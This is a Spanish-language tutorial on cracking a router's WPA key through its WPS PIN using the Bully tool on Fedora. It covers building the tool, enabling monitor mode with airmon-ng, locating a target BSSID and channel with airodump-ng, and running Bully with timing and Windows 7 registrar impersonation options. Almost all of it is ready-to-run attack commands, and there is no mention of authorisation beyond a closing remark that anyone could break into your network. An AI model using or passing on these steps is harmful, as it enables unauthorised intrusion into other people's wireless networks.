Como viene siendo habitual en este maravilloso mundo que es Linux, abrimos un Terminal (o consola) y tecleamos lo siguiente para crear un directorio donde trabajar:

$ mkdir /home/#vuestro-nombre-de-usuario#/github-Bully
$ cd /home/#vuestro-nombre-de-usuario#/github-Bully
 

Y clonamos los fuentes:

$ git clone https://github.com/Lrs121/bully 

Cuando finalice la clonación, hacemos:

$ cd src
$ make
$ sudo make install
 

Si esto último os arrojara algún error, seguramente es porque no tenéis instalado el compilador GCC o el GCC-C++, lo cual lo solucionáis con: 

$ sudo yum install gcc gcc-c++

Cuando ya tengamos instalado Bully, nos aseguramos de tener instalado la suite aircrack-ng:

$ sudo yum install aircrack-ng  

Y hacemos:

$ iwconfig

Para conocer el nombre de nuestra interfaz WiFi. En Fedora, desde Fedora 19 si no me equivoco, han dejado de ser wlan0 para ser wlpXsY, en concreto el mío es wlp2s0, con lo que activo mi tarjeta en modo monitor (o modo promiscuo) con airomon-ng de la siguiente forma:

$ sudo airmon-ng start wlp2s0

Comprobamos si nos ha cambiado el nombre de la interfaz WiFi nuevamente con 'iwconfig' (puede aparecer mon0 o mantenerse wlp2s0, depende de la tarjeta y la versión del software). Luego lanzamos airodump-ng y localizamos los parámetros del router vulnerable, en particular debemos anotar la dirección MAC de la BSSID en cuestión y su canal:

$ sudo airodump-ng mon0

Si nos diera un error del tipo "Failed. Siocsifflags error : Name not unique on network", es porque, por alguna razón que aún no he descubierto, confunde las interfaces WiFi y se cree que hay dos con el mismo nombre. Lo que haríamos sería lo siguiente (sólo hacer estos pasos si nos fallara, sino seguid ignorando este párrafo):

$ airmon-ng stop mon0
$ ifconfig wlp2s0 down
$ iwconfig wlp2s0 mode monitor
$ ifconfig wlp2s0 up
$ airodump-ng wlp2s0
 

Cuando tengamos lo que necesitamos, matamos el proceso (CTRL + C) para parar airodump-ng y lanzamos Bully con:

$ bully -b 00:11:22:33:44:55 -c 11 mon0

Y a esperar de 2 a 5 horas a que nos proporcione Bully la clave WPA del router. 

Aunque se puede ser más cafetero y, por ejemplo, prevenir los over-flooding con tiempos de espera:

$ bully -b 00:11:22:33:44:55 -c 11 -1 1 -2 5 mon0

O camuflarnos como si fuéramos un servicio de registro de Windows 7:

$ bully -b 00:11:22:33:44:55 -c 11 -W mon0

En definitiva, mucho cuidado que cualquiera se os puede colar.